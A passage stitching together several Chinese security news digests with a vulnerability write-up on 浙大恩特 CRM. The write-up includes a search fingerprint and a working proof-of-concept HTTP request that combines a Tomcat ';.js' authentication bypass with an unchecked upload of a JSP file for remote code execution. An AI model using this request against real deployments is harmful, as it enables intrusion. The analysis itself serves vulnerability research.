5.9），并发布补丁与缓解建议；受影响的EPYC系列、Supermicro主板与Azure机群已着手修复，部分嵌入式型号的修补计划在2025年11月发布。研究者警告称，此漏洞可被有管理权限的恶意管理程序利用以注入代码、伪造证明与回放攻击，严重削 6、近半数地球同步卫星传输未加密数据，可低成本窃听通信 https://securityaffairs.com/183404/hacking/unencrypted-satellites-expose-global-communications.html 研究发现近半数地球同步卫星传输未加密数据，敏感通信易被截获。仅用800美元设备即可窃听私人通话、短信及军事通信，暴露全球网络安全漏洞。部分企业已加密，但关键基础设施仍存风险。 ７、甲骨文EBS两周内连爆高危漏洞，可导致敏感数据泄露 https://www.csoonline.com/article/4072174/oracle-issues-second-emergency-patch-for-e-business-suite-in-two-weeks.html 甲骨文两周内第二次紧急修补EBS高危漏洞(CVE-2025-61884)，该漏洞允许远程窃取数据。专家警告ERP系统正成为勒索软件新目标，建议企业立即打补丁并排查入侵迹象，同时重新评估ERP安全策略，实施最小权限和零信任原则。 ８、Windows远程访问连接管理器0Day漏洞已被用于攻击利用 https://cybersecuritynews.com/remote-access-connection-manager-0-day/ 微软确认Windows远程访问连接管理器存在高危0Day漏洞CVE-2025-59230，攻击者可借此提升至SYSTEM权限。该漏洞影响多个Windows版本，CVSS评分7.8，已遭主动利用。微软紧急发布补丁，未修复系统面临勒索软件等高风险。 ９、西门子高危漏洞可致SIMATIC CP配置遭未授权远程访问 https://securityonline.info/critical-siemens-flaw-cve-2025-40771-cvss-9-8-allows-unauthenticated-remote-access-to-simatic-cp-config/ 西门子发布SIMATIC ET 200SP通信处理器关键安全更新，修复高危漏洞CVE-2025-40771（CVSS 9.8），该漏洞允许未授权远程访问配置数据，影响多款设备V2.4.24之前版本。建议立即升级固件或限制可信IP访问。 10、PolarEdge后门定制攻击威胁思科、群晖及威联通设备 https://securityonline.info/sekoia-exposes-polaredge-backdoor-custom-mbedtls-c2-compromising-cisco-qnap-and-synology-devices/ Sekoia揭露PolarEdge后门利用CVE-2023-20118漏洞攻击思科等设备，通过定制TLS服务器执行命令，采用多层加密和反检测技术，支持多样化操作模式，威胁持续扩散。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

指纹：title="欢迎使用浙大恩特客户资源管理系统" 本文对该系统公开在互联网，但未分析代码细节的漏洞进行审计分析： 前台文件上传RCE 该系统2019版本存在权限绕过加文件上传组合漏洞，可通过上传webshell实现前台RCE。 公开POC： POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacqAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2AContent-Length: 203 ------WebKitFormBoundarye8FPHsIAq9JN8j2AContent-Disposition: form-data; name="file";filename="as.jsp"Content-Type: image/jpeg <%out.print("test");%>------WebKitFormBoundarye8FPHsIAq9JN8j2A-- 权限绕过部分先看过滤器： 分析web.xml发现purfilter为全局过滤器： 如上，会对/*也就是任意请求进行拦截，跟进源码： 首先出现的就是白名单后缀+白名单接口，在后续校验中也是对非listExpUrl内容的后缀或者接口才会进行权限校验： 而拦截器在进行后缀白名单检测时，获取后缀的方式如下： 通过获取最后一个.的部分作为后缀。 而且该系统是tomcat容器，基于该容器对;的解析特性，不会匹配到;后面的内容，也就是在进行路由匹配时，只会匹配到CustomerAction.entphone，从而使得CustomerAction.entphone;.js?method=loadFile顺利进入过滤器层面的校验，并且此时获取的后缀又是.js，处于白名单后缀，从而实现权限绕过。 接下来分析：上传点代码漏洞原因： 先在xml文件寻找接口对应后端代码，该接口匹配后缀.entphone，对应代码为：enterphone.EntPhoneControl类。 全局搜索EntPhoneControl类： 跟进漏洞类CustomerAction： 跟进method对应loadFile方法： 要想进入文件上传逻辑，会先进行gesum参数的条件判断： 在gesum不为空时才进入上传逻辑，原数据包里面是没有传gesum参数的，在java里面，一般值会设置为NULL，而NULL不等于空，则能够顺利进入if逻辑。 进入if块后，代码会继续执行以下步骤： 创建CustomerBean并设置gesnum（此时gesnum为null）和tenantID。 调用customerBean.checkGesnum()检查客户代码是否存在。 这一步是关键：若checkGesnum()方法在gesnum为null时返回false（即认为"客户代码不存在"，符合业务逻辑，因为null通常不是有效的客户代码），则会进入else分支，执行文件上传逻辑。 随后通过如上文件获取文件名，并直接进行文件上传，由于未进行后缀校验，从而可上传jsp文件，造成RCE漏洞。 本地环境漏洞复现： 上传成功，并成功解析：

1、西班牙摧毁“GXC Team”网络犯罪集团 https://www.group-ib.com/media-center/press-releases/guardia-civil-gxc-team-takedown/ 西班牙国民警卫队成功捣毁名为“GXC Team”的网络犯罪组织，并逮捕其核心成员——25岁的巴西籍嫌犯“GoogleXcoder”。该团伙运营“犯罪即服务”（CaaS）平台，通过Telegram和俄语黑客论坛出售AI钓鱼工具包、安卓恶意软件及语音诈骗工具。调查显示，其攻击目标涵盖西班牙、英国、美国、斯洛伐克及巴西的银行、电商与交通企业，至少运营250个仿冒网站及9种拦截短信与一次性密码的恶意程序。警方在多地同步突袭中缴获源 2、SimonMed数据泄露致逾120万名患者受影响 https://www.maine.gov/agviewer/content/ag/985235c7-cb95-4be2-8792-a1252b4f8318/db44458c-e230-4f17-88b4-0513fc890cc6.html 美国医学影像服务商SimonMed Imaging近日披露，其系统在年初遭黑客入侵，导致约120万名患者个人信息泄露。此次事件发生于1月21日至2月5日期间，黑客在三周内获得对公司网络的未经授权访问。公司在1月27日接获供应商警报后启动调查，并采取了重置密码、多因素认证、部署EDR监控及限制外部访问等措施。勒索组织Medusa随后声称对此次攻击负责，并泄 3、Sudo工具曝高危权限提升漏洞，PoC已公开 https://www.freebuf.com/articles/network/452573.html 广泛使用的 Sudo 工具中存在一个高危漏洞（CVE-2025-32463），随着概念验证（PoC）利用代码的公开，引发了全球 Linux 系统管理员的高度警惕。该漏洞影响 Sudo 1.9.14 至 1.9.17 版本的 chroot 功能，可使本地攻击者轻松将权限提升至 root 级别。 4、Clevo UEFI固件泄露英特尔Boot Guard私钥 https://www.freebuf.com/articles/system/452521.html CERT协调中心（CERT/CC）针对编号为CVE-2025-11577的关键供应链漏洞发布警告。研究人员发现，Clevo的UEFI固件更新包意外泄露了英特尔Boot Guard私钥，攻击者可利用这些密钥签署恶意固件，使其通过系统信任验证，从而破坏预启动环境并威胁平台完整性。 5、AMD安全加密虚拟化技术漏洞，致加密虚拟机可被完全攻破 https://www.freebuf.com/articles/system/452494.html 苏黎世联邦理工学院研究团队披露了一个被命名为RMPocalypse的关键漏洞（CVE-2025-0033），该漏洞影响了AMD Zen 3、Zen 4和Zen 5处理器系列的机密计算技术。攻击者可利用此漏洞完全攻破受SEV-SNP（安全加密虚拟化-安全嵌套分页）保护的虚拟机，使AMD这项旗舰级云安全功能的所有保密性和完整性保障全部失效。 6、Astaroth银行木马滥用GitHub维持运营以规避打击 https://thehackernews.com/2025/10/astaroth-banking-trojan-abuses-github.html Astaroth银行木马利用GitHub托管恶意配置规避打击，通过钓鱼邮件传播，针对拉美金融网站窃密，具备反分析能力。攻击链涉及JavaScript、AutoIt和Delphi，滥用GitHub作为备用C2基础设施。 7、澳洲航空数百万客户数据遭泄露 https://www.csoonline.com/article/4071394/daten-von-millionen-qantas-kunden-offentlich.html 澳航570万客户数据遭黑客窃取后被公开，含姓名、邮箱等个人信息。黑客勒索未果，数据已在暗网和公共网络流传。此次7月攻击波及全球约40家企业。 8、黑客滥用175个npm软件包与unpkg CDN发起大规模网络钓鱼 https://www.anquanke.com/post/id/312538 Socket威胁研究团队揭露了一场大规模供应链滥用活动，该活动利用npm公共注册表和unpkg.com 的CDN作为免费托管基础设施发起钓鱼攻击。这项代号为“Beamglea”的行动涉及175个恶意npm包，累计下载量超26,000次，目标覆盖全球工业、能源和科技领域的135家以上组织。 9、黑客利用Gladinet文件共享软件的零日漏洞发起在野攻击 https://www.anquanke.com/post/id/312552 威胁行为者正在利用Gladinet CentreStack和Triofox产品中的零日漏洞（CVE-2025-11371），该漏洞允许本地攻击者无需认证即可访问系统文件。目前已有至少三家公司成为攻击目标。尽管补丁尚未发布，但客户可采取缓解措施。 10、微软在新版中移除Win11离线安装选项，全面强制联网登录 https://www.anquanke.com/post/id/312487 微软已取消了在Windows 11安装过程中创建纯本地用户账户的最后途径，这意味着今后所有全新安装都必须连接互联网并登录微软账户。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、ChaosBot利用Discord频道控制受害者电脑 https://www.esentire.com/blog/new-rust-malware-chaosbot-uses-discord-for-command-and-control 网络安全公司eSentire报告称，研究人员在2025年9月底于一家金融服务客户环境中首次发现一款名为ChaosBot的Rust编写后门。攻击者通过被窃取的Cisco VPN凭据与过度权限的AD账户（serviceaccount），利用WMI横向传播并部署恶意DLL（msedge_elf.dll，借助 identity_helper.exe侧载）。该后门常通过含恶意LNK的钓鱼邮件分发，打开时会执行Power 2、研究人员发现175个恶意npm包用于凭证钓鱼 https://socket.dev/blog/175-malicious-npm-packages-host-phishing-infrastructure 安全研究机构Socket披露，一场代号“Beamglea”的大规模凭证钓鱼行动利用175个恶意npm包（累计下载约2.6万次）和unpkg CDN托管重定向脚本，针对135+家工业、科技与能源企业。攻击者借助redirect_generator.py自动发布名为redirect-xxxx的包，注入受害者邮箱与定制钓鱼URL，生成含beamglea.js的HTML诱饵（已发现630余个），邮件或其它途径传播后，受害者在浏览器打开即被重定 3、Stealit恶意软件通过游戏和VPN安装程序进行传播 https://www.fortinet.com/blog/threat-research/stealit-campaign-abuses-nodejs-single-executable-application Fortinet FortiGuard Labs披露，名为Stealit的活跃恶意软件团伙利用Node.js的Single Executable Application（SEA）及部分Electron打包特性，通过伪装的游戏和VPN安装程序在Mediafire、Discord等文件站点传播。该样本在运行前做反分析与沙箱检测，并将Base64编码的12字符认证密钥写入%temp%\c 4、SonicWall VPN遭大规模入侵 https://www.huntress.com/blog/sonicwall-sslvpn-compromise 网络安全公司Huntress警告称，自2025年10月4日起，黑客正大规模入侵SonicWall SSL VPN设备，已影响超100个账户、涉及16家客户。攻击者通过已掌握的有效凭证快速登录多台设备，部分仅短暂连接即断开，部分则执行网络扫描并尝试访问本地Windows账户。此次事件发生背景为SonicWall此前确认MySonicWall云备份服务泄露防火墙配置文件，虽尚无证据表明两起事件关联，但安全专家提醒，配置文件中包含可被利用的敏感凭证与设置信息。Huntress建议受影 5、Oracle EBS曝高危未授权漏洞 https://www.oracle.com/security-alerts/alert-cve-2025-61884.html Oracle发布安全警报，披露其E-Business Suite存在编号为CVE-2025-61884的高危漏洞（CVSS 7.5），受影响版本涵盖12.2.3至12.2.14。该漏洞可被远程攻击者经HTTP在无身份验证的情况下利用，直接访问或控制Oracle Configurator中的敏感数据。尽管目前暂无在野利用报告，Oracle敦促用户尽快安装修复更新。首席安全官Rob Duhart表示，该问题影响部分EBS部署，若被武器化可能导致敏感资源泄露。值得注意的 6、微软Defender for Endpoint漏洞3个月未修复 https://www.freebuf.com/articles/endpoint/452300.html 研究人员发现微软 Defender for Endpoint（DFE）与其云服务之间的网络通信存在严重漏洞，可使入侵后的攻击者绕过身份验证、伪造数据、泄露敏感信息，甚至将恶意文件上传至调查数据包。 7、7-Zip两大高危漏洞可导致任意代码执行 https://www.freebuf.com/articles/network/452293.html Zero Day Initiative（ZDI）近日披露了开源压缩工具 7-Zip 中两处高危漏洞的技术细节，攻击者可诱骗用户打开特制 ZIP 文件实现任意代码执行。目前这两个漏洞已在 7-Zip 25.00 版本中完成修复。 8、微软终修复 Win11 异常重启故障："更新并关机"功能恢复正常 https://securityonline.info/microsoft-finally-fixes-windows-11-bug-causing-pcs-to-auto-restart-instead-of-update-and-shut-down/ Windows 11修复"更新并关机"异常重启问题，此前该选项会错误执行重启导致夜间自动开机。补丁已在预览版推出，正式版将很快更新。 9、Happy DOM曝CVSS 9.4严重RCE漏洞 https://www.freebuf.com/articles/web/452325.html 流行的JavaScript包Happy DOM曝出严重安全漏洞，该漏洞可使攻击者逃逸Node.js虚拟机（VM）上下文并在主机系统上执行任意代码。该漏洞被追踪为CVE-2025-61927，CVSSv4评分为9.4。Happy DOM是一款用于测试、爬取和服务器端渲染（SSR）的浏览器模拟工具。据安全公告显示："Happy DOM v19及更低版本存在安全漏洞，可能导致系统遭受远程代码执行（RCE）攻击。" 10、新型“Mic-E-Mouse”攻击：光学鼠标秒变隐蔽窃听设备 https://www.anquanke.com/post/id/312479 加州大学欧文分校的研究人员展示了一种新颖且实用的侧信道攻击，名为”Mic-E-Mouse”。该攻击利用日常光学鼠标的传感器来还原可理解的人声，从而将普通鼠标变成一种粗糙但隐蔽的麦克风。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、ClayRat间谍软件伪装热门应用攻击安卓用户 https://zimperium.com/blog/clayrat-a-new-android-spyware-targeting-russia 移动安全公司Zimperium披露，一种名为ClayRat的安卓间谍软件近期针对俄罗斯用户展开攻击，伪装成WhatsApp、TikTok、YouTube等热门应用，通过虚假网站和Telegram频道诱导下载。该恶意程序可窃取短信、通话记录、通知及设备信息，甚至可远程拍照、发送短信或拨打电话。ClayRat具备自我传播能力，会向受害者通讯录中的所有联系人发送恶意链接。研究人员在过去90天内检测到逾600个样本和50个投递器，每次迭代均强化混淆技术以 2、Cl0p关联黑客利用Oracle零日攻击数十机构 https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation Google威胁情报组与Mandiant联合报告称，自2025年8月起，多家组织因Oracle E-Business Suite（EBS）软件零日漏洞遭受入侵，攻击行为被认为与Cl0p勒索组织有关。攻击者利用编号为CVE-2025-61882的高危漏洞（CVSS 9.8），结合SSRF、CRLF注入及认证绕过等手法，远程执行代码并窃取敏感数据。9月下旬起，黑客从被盗账户向企业高管群发勒索邮件 3、SonicWall云防火墙备份遭入侵引发紧急排查 https://www.sonicwall.com/support/knowledge-base/mysonicwall-cloud-backup-file-incident/250915160910330 网络安全厂商SonicWall确认，其云备份服务遭未授权访问，所有使用该功能的客户防火墙配置备份文件均被黑客获取。文件虽含加密凭据，但其被窃取可能提升针对性攻击风险。公司已发布设备自检与修复工具，并敦促用户立即登录MySonicWall账户核查设备状态。此前，SonicWall曾要求客户重置凭据，称仅约5%客户受影响，但最新调查显示影响范围更广。攻击者通过暴力破解云备份API接口，获取防 4、Gladinet与TrioFox零日漏洞遭黑客主动利用 https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw 网络安全公司Huntress警告称，Gladinet CentreStack与TrioFox产品中存在的零日漏洞（CVE-2025-11371）已被黑客在野利用。该漏洞为未认证的本地文件包含（LFI）缺陷，影响16.7.10368.56560及更早版本，允许攻击者访问系统文件并提取Web.config中的机器密钥，从而结合旧漏洞CVE-2025-30406实现远程代码执行（RCE）。自9月27日起，Huntress已确认至少 5、RondoDox僵尸网络利用56个已知漏洞全球扩散 https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat Trend Micro研究人员披露，新型大型僵尸网络“RondoDox”正利用多达56个已知漏洞（n-day漏洞），攻击全球30余种设备类型，包括DVR、NVR、CCTV系统及Web服务器。该僵尸网络自2025年6月起活跃，采用“漏洞散射”（exploit shotgun）策略，同时利用多个漏洞扩大感染面，即便噪声明显也不加掩饰。分析显示，RondoDox密切关注Pwn2Own黑客竞赛中披露的漏洞，并迅速武 6、FileFix攻击变种以缓存走私绕过安全防护 https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/ 网络安全研究员Marcus Hutchins披露，一种名为“FileFix”的社交工程攻击新变种正利用缓存走私（cache smuggling）技术，绕过安全软件隐蔽下载恶意ZIP文件。攻击伪装为“Fortinet VPN 合规检查器”，诱导受害者将伪造的网络路径粘贴至资源管理器地址栏。由于路径中隐藏了填充空格后的PowerShell命令，用户在回车后会在无界面模式下执行恶意脚本。该脚本从Chrome缓存中提取伪装为图像的ZIP文件并运行其 7、黑客利用“薪资劫持”攻击入侵多所美国大学 https://www.microsoft.com/en-us/security/blog/2025/10/09/investigating-targeted-payroll-pirate-attacks-affecting-us-universities/ 微软威胁情报团队披露，网络犯罪团伙Storm-2657自2025年3月起发起“薪资劫持”（Payroll Pirate）攻击，针对美国高校员工窃取工资支付。攻击者通过钓鱼邮件窃取Workday等人事SaaS平台账户，部分还利用中间人钓鱼（AITM）链接窃取MFA验证码，实现账户接管。微软称，已有三所大学的11个账户被攻破，攻击邮件扩散至 8、苹果将RCE漏洞赏金提高至200万美元以应对商业间谍软件威胁 https://www.csoonline.com/article/4071044/apple-bumps-rce-bug-bounties-to-2m-to-counter-commercial-spyware-vendors.html 苹果大幅提高漏洞赏金至200万美元，对抗商业间谍软件攻击，新增内存安全技术提升漏洞利用难度，并向高风险人群提供安全设备。 9、首个利用GPT-4实时生成代码的"MalTerminal"恶意软件现世 https://cybersecuritynews.com/llm-enabled-malterminal-malware-gpt-4/ 首个利用GPT-4实时生成恶意代码的"MalTerminal"恶意软件被发现，标志着攻击技术重大转变：动态生成代码使传统静态检测失效。研究人员通过追踪API密钥和提示结构开发新型检测方法，揭示此类威胁依赖外部API的弱点，为防御未来自适应攻击提供关键窗口。 10、FBI第三次查封BreachForums服务器 https://www.csoonline.com/article/4071014/fbi-seizes-breachforums-servers-as-threatened-salesforce-data-release-deadline-approaches.html 黑客组织威胁泄露10亿条Salesforce数据，国际警方查封BreachForums但勒索仍在继续。SaaS服务成新攻击面，专家建议企业升级防护措施应对暗网威胁。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。